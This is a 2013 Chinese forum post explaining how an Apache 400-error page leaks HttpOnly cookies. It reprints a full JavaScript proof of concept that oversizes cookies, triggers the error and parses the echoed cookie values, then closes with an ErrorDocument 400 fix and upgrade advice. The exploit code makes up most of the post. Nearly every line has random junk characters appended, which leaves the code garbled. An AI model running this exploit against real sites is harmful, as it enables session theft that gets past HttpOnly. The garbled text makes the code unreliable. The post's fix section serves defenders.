很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
2 g! `! b- y. w, q& F% O" z$ b2 k' ~! y0 W
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
4 }, ^9 ]* U3 g8 e+ T/ O . ^/ R4 n4 p# X9 o: n( R
! m+ ^ |- L; h$ E: | k2 D" @
// http://www.exploit-db.com/exploits/18442/) V6 a+ K, L# [! f2 d" z; I& _
function setCookies (good) {8 q8 X* Q4 h6 E& B; Z% M$ x& }
// Construct string for cookie value
, J) @4 Q% Z0 J8 s7 Pvar str = "";
, m3 B' }9 {$ o# ifor (var i=0; i< 819; i++) {* L0 P9 X6 x( q( l) \9 g. I6 [
str += "x";! S! x0 k/ J! R
}
2 g* C9 e3 k6 m// Set cookies8 G% o7 ^ D# h/ v2 W: `& c0 D
for (i = 0; i < 10; i++) {; ?, B% @7 V, s: f8 Y& j
// Expire evil cookie
4 r% Q1 J/ Q2 o4 y5 Eif (good) {
: W1 ^) L, V. d8 Mvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
9 f+ a$ {! ]5 p}
" w2 f# a% h! n+ j0 n7 t2 K// Set evil cookie
- R E$ j0 t% l! L: \else { @' {% d% H. ^; U! G& ^4 D
var cookie = "xss"+i+"="+str+";path=/";
# j) T' b1 f0 C- t}
8 y8 v$ Y: h, ]4 [* f1 Fdocument.cookie = cookie;
4 t1 @& m F& }* D# i% b}% S+ ^3 y% n I( D& Q
}3 e+ ^# }* l4 R0 J# x* M- s& `
function makeRequest() {+ F, v- F4 [' w l! x
setCookies();
: ]' `# k9 Z2 j6 Afunction parseCookies () {4 X; f4 g% y- d9 L: \3 r1 ?
var cookie_dict = {};, p$ P- B& k4 n
// Only react on 400 status0 ~9 s6 G" R% D/ e" X: Q7 ?
if (xhr.readyState === 4 && xhr.status === 400) {
+ {" Y- S2 O! V5 [! b2 ~1 p/ V// Replace newlines and match <pre> content9 D5 t8 W% }% U
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
8 X' `* d a- h- O: n1 I# }8 f. Hif (content.length) {
; r6 k/ v$ y. M! M3 l- v// Remove Cookie: prefix% `( s$ F3 G* Q: z5 d( u8 x( p
content = content[1].replace("Cookie: ", "");1 V @0 {, a/ _9 l+ E$ M
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
) ~" ]4 u5 e! F7 A0 L) w2 e2 S- c; r// Add cookies to object% B. V9 N) ?1 u0 |
for (var i=0; i<cookies.length; i++) {
$ z1 |" G; Y; B5 n2 C0 J5 u8 n3 Fvar s_c = cookies.split('=',2);' H/ I6 u% \7 b1 s
cookie_dict[s_c[0]] = s_c[1];
! m3 t3 p$ y# j- F5 F9 ?}
& C- i: _$ c! t6 z4 t3 p- i}
& m2 h: R7 V; g( c) t3 @+ T0 j// Unset malicious cookies# ^( q0 c& H! X' y
setCookies(true);6 c7 Q- X9 X3 V8 R- x# Y1 ~, e$ C
alert(JSON.stringify(cookie_dict));& T- r/ U; [5 R- ]. y
}
k9 d/ ~7 f# d8 e* s}* M. v' g) B, A4 n" x8 E
// Make XHR request
, t0 Q1 s9 n5 f" f! ~var xhr = new XMLHttpRequest();( E7 ?% _5 U- t" g
xhr.onreadystatechange = parseCookies;
" m) P3 B: j- \# V) p- g# sxhr.open("GET", "/", true);' g$ Z; ^ n( C M& _: y: s
xhr.send(null);
! U, X+ h) V4 t}
' F1 N' A5 ~7 umakeRequest();
( V/ I A5 |6 s+ o4 T' D7 ]/ j$ B' R
你就能看见华丽丽的400错误包含着cookie信息。3 s$ _2 K& s( w* z! V# I0 c
' ~# z4 x% |( i" x; o8 t下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
9 Y+ R5 x) S$ J. h* d {% h p7 u
0 H6 @) S/ I9 v% B) X! G. r$ v" @" [修复方案: a$ \- c# y6 H9 ^* [
D5 {( B; q. r- B
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
, u2 z7 d _; g" u0 z) W6 g* B ]* n9 C6 _ Z$ _ `
In the event of a problem or error, Apachecan be configured to do one of four things,
8 S: c# i( z$ w2 E$ }2 e6 T
9 U9 l$ y- p& F$ R. s* }& Z2 U1. output asimple hardcoded error message输出一个简单生硬的错误代码信息( Z- H' r: e9 q3 _4 e
2. output acustomized message输出一段信息% v/ \( P A# d9 M' K; b7 X
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 * F8 g9 K5 ]! m! d# Y
4. redirect to an external URL to handle theproblem/error转向一个外部URL- p# m; i3 R3 A' M
$ G% o7 ~ P/ p! W' o# b% r
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容( A( I' d) S) t( e6 k! h7 i
6 I+ _/ ?; @/ o9 WApache配置:
) V$ n4 I- N, f; l" w! v; I0 J5 d! X O
ErrorDocument400 " security test"
/ { B+ a2 p! `4 g2 x8 k4 g1 R6 A9 l' y! d3 l4 R9 p- O7 }' j
当然,升级apache到最新也可:)。
+ i& ]4 k# a. E7 F6 d$ C) I$ s; v' G3 V7 M7 Z& _$ H3 u
参考:http://httpd.apache.org/security/vulnerabilities_22.html
* u' u* G4 I( V* B/ y( i
* l: Z" i6 d' s6 t6 A1 U: p$ j; m3 @ |
发表于 2013-4-19 19:15:43
收藏
支持
反对